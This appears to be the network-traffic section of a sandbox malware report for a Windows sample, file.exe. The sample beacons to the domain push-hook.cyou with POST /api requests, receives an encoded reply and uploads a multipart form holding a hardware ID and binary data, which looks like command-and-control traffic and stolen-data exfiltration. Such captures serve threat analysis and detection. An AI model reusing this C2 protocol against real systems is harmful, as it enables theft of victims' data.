                                                                  Nov 24, 2024 13:28:42.338917971 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.338965893 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.339308023 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.339364052 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.339382887 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.339411974 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.339618921 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.339659929 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.339706898 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.339796066 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.339859009 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.383364916 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.383614063 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.383661985 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.383711100 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.383744955 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:42.383883953 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:42.383943081 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:47.046854973 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:47.046953917 CET44349736172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:47.047142982 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:47.047202110 CET49736443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:47.077841043 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:47.077874899 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:47.078036070 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:47.078296900 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:47.078310013 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:48.318348885 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:48.318464994 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:48.322189093 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:48.322197914 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:48.322467089 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:48.330749035 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:48.330761909 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:48.330812931 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:49.043009996 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:49.043108940 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:49.043215036 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:49.043494940 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:49.043513060 CET44349741172.67.161.207192.168.2.4
                                                                  Nov 24, 2024 13:28:49.043524027 CET49741443192.168.2.4172.67.161.207
                                                                  Nov 24, 2024 13:28:49.043529987 CET44349741172.67.161.207192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 24, 2024 13:28:25.560316086 CET5218953192.168.2.41.1.1.1
                                                                  Nov 24, 2024 13:28:25.702203035 CET53521891.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 24, 2024 13:28:25.560316086 CET192.168.2.41.1.1.10x706Standard query (0)push-hook.cyouA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 24, 2024 13:28:25.702203035 CET1.1.1.1192.168.2.40x706No error (0)push-hook.cyou172.67.161.207A (IP address)IN (0x0001)false
                                                                  Nov 24, 2024 13:28:25.702203035 CET1.1.1.1192.168.2.40x706No error (0)push-hook.cyou104.21.10.6A (IP address)IN (0x0001)false
                                                                  • push-hook.cyou
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449730172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:27 UTC261OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                  Data Ascii: act=life
                                                                  2024-11-24 12:28:28 UTC1020INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=kskkm0djfhkabvmrlem4fqtbh8; expires=Thu, 20-Mar-2025 06:15:07 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wlZkJE%2FhlmlGHZ7nOEi6llCNsjCahRzhM1viasngra8OJ5w2e2u%2B3JTFg%2FawXt%2FWmRqsdeHTb%2F5VOcM1lhUKUs%2FKygg2kHtWAuW%2F1480TQR5iy2UKWgjbLnXmb9FjqQUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e7966213c4bc42c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1654&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=905&delivery_rate=1745367&cwnd=225&unsent_bytes=0&cid=8bb677ad2f4d9a79&ts=1453&x=0"
                                                                  2024-11-24 12:28:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                  Data Ascii: 2ok
                                                                  2024-11-24 12:28:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449731172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:29 UTC262OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 46
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:29 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                  Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                  2024-11-24 12:28:30 UTC1013INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=df38c7vc80jjbdvtl2qmsak2nc; expires=Thu, 20-Mar-2025 06:15:09 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gabHBJFvND6JB8hZwBVXm6kuBJ4bo5y13xN0fpfP6r9Fyf%2FVxe0m1b%2Bowfg3%2Fdq3ESdcpw95k9eAkameozXooPr91z66bWd2bJ2QmHl5am3Ib2Y%2FclAPESG0A1d7pRwFSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8e79662f3d1c4303-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=944&delivery_rate=1621321&cwnd=235&unsent_bytes=0&cid=e338ab77fc5f263c&ts=705&x=0"
                                                                  2024-11-24 12:28:30 UTC356INData Raw: 34 34 36 63 0d 0a 33 62 52 36 75 6e 59 62 35 73 6b 64 2f 30 2f 32 71 6a 72 65 34 42 5a 64 63 6f 41 4a 69 6f 4b 75 6c 34 76 36 7a 32 69 4f 4a 7a 61 6d 6c 67 79 59 54 43 2f 4b 36 32 36 61 62 63 7a 65 53 4b 75 46 4f 6e 38 54 35 43 75 77 35 4d 2f 37 2b 4a 2f 6a 53 76 68 4b 46 4f 66 53 47 39 59 46 66 73 72 72 65 49 64 74 7a 50 46 42 2f 49 56 34 66 30 69 69 62 4f 44 67 7a 2f 76 70 6d 36 51 48 2f 6b 74 56 74 64 67 64 30 68 4e 34 67 71 68 78 6b 69 71 54 7a 31 75 30 6a 6e 38 77 47 75 30 72 70 71 44 4c 37 61 6e 41 37 53 58 72 55 31 65 51 31 51 6e 52 56 47 62 4b 73 6a 2b 61 49 64 53 51 47 4c 2b 46 64 44 45 55 35 47 4c 69 36 73 62 7a 36 4a 36 6c 47 4f 64 42 58 72 58 57 48 74 4d 5a 63 5a 61 6c 65 35 55 68 6c 63 56 62 2f 4d 77 30 4f 41 69 69 4d 36 69 7a 2f 76 62 34 69
                                                                  Data Ascii: 446c3bR6unYb5skd/0/2qjre4BZdcoAJioKul4v6z2iOJzamlgyYTC/K626abczeSKuFOn8T5Cuw5M/7+J/jSvhKFOfSG9YFfsrreIdtzPFB/IV4f0iibODgz/vpm6QH/ktVtdgd0hN4gqhxkiqTz1u0jn8wGu0rpqDL7anA7SXrU1eQ1QnRVGbKsj+aIdSQGL+FdDEU5GLi6sbz6J6lGOdBXrXWHtMZcZale5UhlcVb/Mw0OAiiM6iz/vb4i
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 53 35 64 35 59 6d 6b 64 70 54 74 59 39 35 50 78 33 6f 5a 4f 76 67 79 2f 2f 6a 6c 36 63 4f 34 55 68 53 76 39 5a 59 6c 6c 52 2b 6e 4f 73 6e 33 51 36 52 32 46 2b 77 6c 44 59 46 55 50 30 6c 38 61 44 4c 2b 61 6e 41 37 51 4c 70 52 6c 65 30 32 52 76 51 48 32 75 45 75 58 6d 51 4b 49 62 4f 58 62 4b 49 64 79 30 61 37 47 33 72 36 63 66 38 37 4a 2b 70 53 71 49 46 55 36 65 57 51 4a 67 31 64 49 2b 6e 64 59 6f 74 31 4e 63 57 70 63 4a 7a 4d 31 43 36 4b 2b 7a 68 79 50 54 74 6c 71 4d 4f 34 45 4e 61 73 74 6b 65 30 68 52 2b 6a 71 4e 33 6e 43 43 66 78 31 69 35 6a 33 41 35 48 4f 4e 75 71 4b 36 4d 38 76 48 59 39 55 72 43 51 6c 65 74 6c 43 33 62 47 6e 65 44 76 54 2b 43 59 34 32 49 58 37 44 43 4c 48 38 65 35 32 54 36 34 64 37 77 35 34 71 68 44 2b 70 49 56 37 48 57 48 64 38 5a 64
                                                                  Data Ascii: S5d5YmkdpTtY95Px3oZOvgy//jl6cO4UhSv9ZYllR+nOsn3Q6R2F+wlDYFUP0l8aDL+anA7QLpRle02RvQH2uEuXmQKIbOXbKIdy0a7G3r6cf87J+pSqIFU6eWQJg1dI+ndYot1NcWpcJzM1C6K+zhyPTtlqMO4ENastke0hR+jqN3nCCfx1i5j3A5HONuqK6M8vHY9UrCQletlC3bGneDvT+CY42IX7DCLH8e52T64d7w54qhD+pIV7HWHd8Zd
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 43 59 34 32 49 58 37 44 43 4c 48 38 63 36 32 76 6a 36 73 6a 31 37 70 57 6f 43 65 74 47 57 62 6a 63 46 74 38 51 64 59 32 6d 65 5a 30 71 6b 4d 31 4b 75 59 74 34 4d 31 43 73 4b 2b 2f 34 6a 4b 32 70 74 36 6f 63 37 32 70 58 72 74 39 59 78 31 70 67 78 4b 78 7a 33 58 58 55 7a 31 32 30 69 58 49 33 45 50 42 75 35 75 76 4e 2f 2b 2b 5a 6f 41 62 71 52 56 57 2f 30 42 54 59 45 33 36 57 75 58 71 62 50 35 36 49 46 76 79 46 62 48 39 49 6f 6c 33 34 39 39 33 6a 71 36 32 75 42 4f 4a 43 51 76 2f 4a 56 73 46 55 66 6f 6a 72 4a 39 30 6d 6c 4d 52 66 74 49 52 77 4e 78 2f 74 59 76 72 68 77 50 76 37 6e 36 30 44 34 6b 70 59 74 74 73 66 31 52 39 7a 69 61 39 34 6e 47 33 61 69 46 2b 6b 77 69 78 2f 4a 76 4a 6d 35 4d 37 48 2b 65 44 59 73 6b 54 31 42 56 4f 7a 6c 6b 43 59 45 48 57 4d 6f 58
                                                                  Data Ascii: CY42IX7DCLH8c62vj6sj17pWoCetGWbjcFt8QdY2meZ0qkM1KuYt4M1CsK+/4jK2pt6oc72pXrt9Yx1pgxKxz3XXUz120iXI3EPBu5uvN/++ZoAbqRVW/0BTYE36WuXqbP56IFvyFbH9Iol34993jq62uBOJCQv/JVsFUfojrJ90mlMRftIRwNx/tYvrhwPv7n60D4kpYttsf1R9zia94nG3aiF+kwix/JvJm5M7H+eDYskT1BVOzlkCYEHWMoX
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 7a 46 2b 34 68 48 74 2f 58 71 4a 73 38 4b 43 55 74 63 61 2f 6d 45 6a 4e 66 78 53 67 6d 41 47 59 45 33 58 45 38 7a 2b 52 4c 70 6a 41 56 37 71 4c 65 44 55 5a 36 57 66 6a 35 4d 44 38 37 4a 36 73 44 2b 6c 45 55 4c 50 63 48 74 73 58 64 6f 75 6b 64 39 31 6a 31 4d 39 41 2f 4e 6f 30 47 67 66 70 5a 65 36 67 30 37 76 77 32 4b 6f 47 72 42 30 55 73 39 38 65 33 68 46 31 68 61 31 33 6d 43 57 51 79 56 36 36 67 58 73 37 46 65 4e 6b 37 4f 7a 43 2f 2b 69 5a 6f 51 48 6a 54 6c 48 2f 6d 46 6a 66 44 44 6e 63 36 30 36 65 4f 34 50 59 56 50 79 64 4f 69 5a 51 35 57 65 6f 75 49 7a 30 2b 35 4b 6e 42 4f 6c 4b 55 62 7a 5a 48 39 55 53 64 59 36 69 64 35 73 69 6e 64 70 62 73 49 78 7a 4d 52 7a 73 5a 75 4c 6a 77 62 57 6e 32 4b 6f 53 72 42 30 55 6b 39 45 56 39 68 39 31 67 2b 74 67 30 7a 54
                                                                  Data Ascii: zF+4hHt/XqJs8KCUtca/mEjNfxSgmAGYE3XE8z+RLpjAV7qLeDUZ6Wfj5MD87J6sD+lEULPcHtsXdoukd91j1M9A/No0GgfpZe6g07vw2KoGrB0Us98e3hF1ha13mCWQyV66gXs7FeNk7OzC/+iZoQHjTlH/mFjfDDnc606eO4PYVPydOiZQ5WeouIz0+5KnBOlKUbzZH9USdY6id5sindpbsIxzMRzsZuLjwbWn2KoSrB0Uk9EV9h91g+tg0zT
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 35 6f 30 5a 31 44 55 62 50 6a 77 7a 37 66 59 6a 71 34 63 35 30 68 59 2f 38 6c 57 77 56 52 2b 69 4f 73 6e 33 53 75 62 77 56 75 7a 67 33 30 7a 48 65 64 69 37 65 48 4b 38 65 4f 53 72 51 7a 71 52 46 47 31 31 52 6e 53 48 58 36 4d 72 48 79 50 62 64 71 49 58 36 54 43 4c 48 38 35 35 58 6e 6d 38 49 7a 71 70 34 48 74 44 65 41 46 44 50 2f 53 45 74 63 51 66 6f 69 74 65 70 73 67 6c 63 64 5a 76 49 31 77 4e 42 6e 6b 61 75 58 6c 77 66 48 37 6b 71 59 46 34 45 78 59 73 70 5a 57 6d 42 4e 68 78 50 4d 2f 72 43 43 61 78 6c 2b 71 77 6d 74 78 43 61 4a 73 35 4b 43 55 74 65 69 55 6f 67 6e 6a 52 6c 65 2b 33 41 72 4b 47 48 43 4d 72 6e 4f 57 49 35 4c 61 58 72 4f 4c 64 7a 77 5a 35 57 50 6b 36 73 2f 79 71 64 62 74 44 66 51 46 44 50 2f 31 44 38 67 5a 4f 5a 76 6c 5a 74 30 71 6d 49 67 41
                                                                  Data Ascii: 5o0Z1DUbPjwz7fYjq4c50hY/8lWwVR+iOsn3SubwVuzg30zHedi7eHK8eOSrQzqRFG11RnSHX6MrHyPbdqIX6TCLH855Xnm8Izqp4HtDeAFDP/SEtcQfoitepsglcdZvI1wNBnkauXlwfH7kqYF4ExYspZWmBNhxPM/rCCaxl+qwmtxCaJs5KCUteiUognjRle+3ArKGHCMrnOWI5LaXrOLdzwZ5WPk6s/yqdbtDfQFDP/1D8gZOZvlZt0qmIgA
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 6f 57 37 57 54 68 36 63 6a 39 36 70 69 70 44 75 74 41 56 37 50 64 48 39 73 62 66 59 32 6c 64 70 4a 74 32 6f 68 66 70 4d 49 73 66 7a 48 35 61 4f 54 74 6a 4f 71 6e 67 65 30 4e 34 41 55 4d 2f 39 6f 57 33 52 52 7a 67 71 39 36 6d 79 65 52 79 46 4f 2f 6a 58 41 35 46 4f 31 72 34 2b 6e 4e 38 2b 79 53 70 67 7a 68 52 6c 4b 35 6c 6c 61 59 45 32 48 45 38 7a 2b 39 4e 70 6e 45 58 2f 79 64 4f 69 5a 51 35 57 65 6f 75 49 7a 2b 35 5a 79 71 43 75 46 47 58 4c 72 53 45 74 30 55 63 5a 61 6a 66 35 6f 2f 68 73 68 52 75 59 35 33 50 78 54 6b 59 75 37 6a 79 4c 57 6e 32 4b 6f 53 72 42 30 55 6b 74 6f 66 38 52 4e 69 78 4c 51 78 68 47 32 54 78 42 6a 6b 77 6e 55 30 47 75 31 6d 36 2b 62 50 2f 75 79 53 72 41 33 6b 53 45 61 38 32 52 66 63 46 48 61 43 72 58 36 53 4b 35 50 42 57 62 53 46 4e
                                                                  Data Ascii: oW7WTh6cj96pipDutAV7PdH9sbfY2ldpJt2ohfpMIsfzH5aOTtjOqnge0N4AUM/9oW3RRzgq96myeRyFO/jXA5FO1r4+nN8+ySpgzhRlK5llaYE2HE8z+9NpnEX/ydOiZQ5WeouIz+5ZyqCuFGXLrSEt0UcZajf5o/hshRuY53PxTkYu7jyLWn2KoSrB0Uktof8RNixLQxhG2TxBjkwnU0Gu1m6+bP/uySrA3kSEa82RfcFHaCrX6SK5PBWbSFN
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 4d 2f 75 72 4c 35 65 36 50 6f 6b 71 69 42 56 76 2f 6a 69 47 59 48 58 36 66 75 6d 6d 51 50 5a 4f 49 5a 2f 4c 43 62 48 39 49 6f 6c 37 72 37 73 4c 79 2f 34 6e 67 4c 66 70 50 55 36 2f 52 44 39 64 55 4e 38 53 74 50 38 56 2b 32 6f 68 63 72 63 49 73 62 30 4b 35 50 72 75 33 6e 4b 66 32 31 72 52 4b 2b 67 55 4d 37 5a 68 59 79 6c 51 68 78 4f 78 38 6a 7a 2b 53 79 30 36 2f 78 55 6f 42 4e 2f 68 6d 37 76 66 64 79 39 65 66 74 77 66 71 55 6b 58 7a 77 78 76 57 47 6e 36 53 36 7a 48 64 49 74 53 51 59 66 7a 4b 4e 41 42 65 6f 6e 4f 6f 75 49 7a 41 36 70 61 6a 44 66 70 55 47 5a 6a 4d 46 64 34 44 61 4d 54 6c 50 35 74 74 7a 4a 67 57 2f 49 5a 6c 66 30 69 79 4f 62 4f 31 6e 36 4b 35 79 72 4a 45 39 51 56 43 2f 34 35 4b 6c 6c 52 72 78 50 4d 2f 32 69 36 47 32 6c 36 2f 6c 48 64 34 4c 74
                                                                  Data Ascii: M/urL5e6PokqiBVv/jiGYHX6fummQPZOIZ/LCbH9Iol7r7sLy/4ngLfpPU6/RD9dUN8StP8V+2ohcrcIsb0K5Pru3nKf21rRK+gUM7ZhYylQhxOx8jz+Sy06/xUoBN/hm7vfdy9eftwfqUkXzwxvWGn6S6zHdItSQYfzKNABeonOouIzA6pajDfpUGZjMFd4DaMTlP5ttzJgW/IZlf0iyObO1n6K5yrJE9QVC/45KllRrxPM/2i6G2l6/lHd4Lt
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 2b 66 62 6e 6c 71 6f 63 2f 51 68 7a 73 64 45 5a 7a 67 52 75 69 2b 73 78 33 53 76 55 6b 41 72 79 77 6e 41 75 55 4c 6f 37 75 72 75 5a 70 72 37 49 2f 78 57 69 58 42 53 70 6c 6b 43 4b 57 6a 6d 57 36 79 66 64 61 70 66 61 53 72 71 42 59 6a 78 58 33 46 58 50 37 73 76 30 2f 34 69 36 42 61 4e 72 59 70 37 6f 4a 73 30 58 64 34 71 73 61 59 78 74 32 6f 68 58 2f 4e 70 4e 66 31 69 69 56 4b 61 67 31 4c 57 78 32 4a 67 4a 34 6b 74 54 71 63 64 56 2f 78 70 2b 68 62 31 76 69 69 4c 62 35 6d 36 64 77 6a 70 2f 46 71 49 7a 75 71 36 4d 38 66 6a 59 39 56 71 2b 48 67 48 73 67 55 69 4b 43 7a 65 64 36 32 6e 64 64 63 61 47 47 4b 37 43 4c 48 39 58 34 58 6e 36 35 73 2f 6a 36 74 2b 54 4e 4d 74 4c 55 37 37 41 43 4e 55 59 57 49 65 36 64 61 4d 54 67 63 74 57 73 6f 56 69 4c 6c 43 73 4b 2b 65
                                                                  Data Ascii: +fbnlqoc/QhzsdEZzgRui+sx3SvUkArywnAuULo7uruZpr7I/xWiXBSplkCKWjmW6yfdapfaSrqBYjxX3FXP7sv0/4i6BaNrYp7oJs0Xd4qsaYxt2ohX/NpNf1iiVKag1LWx2JgJ4ktTqcdV/xp+hb1viiLb5m6dwjp/FqIzuq6M8fjY9Vq+HgHsgUiKCzed62nddcaGGK7CLH9X4Xn65s/j6t+TNMtLU77ACNUYWIe6daMTgctWsoViLlCsK+e
                                                                  2024-11-24 12:28:30 UTC1369INData Raw: 34 32 75 47 75 74 37 61 70 4c 45 48 38 67 58 4f 36 69 73 63 70 45 54 71 76 39 4a 75 35 49 32 47 52 50 30 61 4b 69 75 6a 4f 32 70 77 4f 30 6e 2f 6b 4a 45 76 4a 51 30 33 78 6c 31 78 4c 51 78 68 47 32 43 69 41 44 76 7a 44 51 74 55 4c 6f 72 72 2b 50 65 35 2b 2b 62 75 77 6d 72 65 32 71 53 78 42 2f 49 46 7a 75 31 70 6e 75 4c 4f 4a 66 59 58 34 4b 38 57 53 30 58 38 6d 69 71 78 66 61 33 32 49 36 75 43 75 4a 43 46 50 47 57 41 4a 68 4d 4f 61 6d 35 65 49 30 75 31 75 31 69 2f 72 4e 69 50 42 44 73 62 4b 6a 2f 67 75 79 70 6a 75 31 53 76 77 73 55 72 5a 5a 41 6d 46 4e 33 69 61 70 38 6b 79 36 47 32 6c 36 2f 6c 48 64 34 4c 74 78 45 34 2b 48 63 2b 50 69 56 71 52 7a 53 65 33 4f 35 30 78 2f 6d 4b 6b 36 56 72 47 2f 66 43 35 66 65 57 2f 7a 4d 4e 43 64 51 75 69 76 50 35 73 6e 79
                                                                  Data Ascii: 42uGut7apLEH8gXO6iscpETqv9Ju5I2GRP0aKiujO2pwO0n/kJEvJQ03xl1xLQxhG2CiADvzDQtULorr+Pe5++buwmre2qSxB/IFzu1pnuLOJfYX4K8WS0X8miqxfa32I6uCuJCFPGWAJhMOam5eI0u1u1i/rNiPBDsbKj/guypju1SvwsUrZZAmFN3iap8ky6G2l6/lHd4LtxE4+Hc+PiVqRzSe3O50x/mKk6VrG/fC5feW/zMNCdQuivP5sny


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449732172.67.161.2074434348C:\Users\user\Desktop\file.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-24 12:28:31 UTC277OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=FZ22HPRA5QKFI1H
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 18144
                                                                  Host: push-hook.cyou
                                                                  2024-11-24 12:28:31 UTC15331OUTData Raw: 2d 2d 46 5a 32 32 48 50 52 41 35 51 4b 46 49 31 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 44 32 33 31 39 39 37 30 31 33 43 45 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 46 5a 32 32 48 50 52 41 35 51 4b 46 49 31 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 5a 32 32 48 50 52 41 35 51 4b 46 49 31 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 46 5a 32 32 48 50
                                                                  Data Ascii: --FZ22HPRA5QKFI1HContent-Disposition: form-data; name="hwid"97D231997013CEACD7CBBD6DF28D3732--FZ22HPRA5QKFI1HContent-Disposition: form-data; name="pid"2--FZ22HPRA5QKFI1HContent-Disposition: form-data; name="lid"FATE99--test--FZ22HP
                                                                  2024-11-24 12:28:31 UTC2813OUTData Raw: cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f
                                                                  Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                  2024-11-24 12:28:33 UTC1016INHTTP/1.1 200 OK
                                                                  Date: Sun, 24 Nov 2024 12:28:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=fr7bqcbs8jjr12srdo7ko9u1bt; expires=Thu, 20-Mar-2025 06:15:11 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFnUoqboboWPkc3cgE7rw%2FbhEF2RMqio9ZnYzKpOgletl07SbUByCeJK43sB9WyKOUi4GsH%2FUbVZiR4yCsM5H%2BNpiU8KYTHCWdPJAiRrfnf5Vo26vupJBUBGKxq0BQfDxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
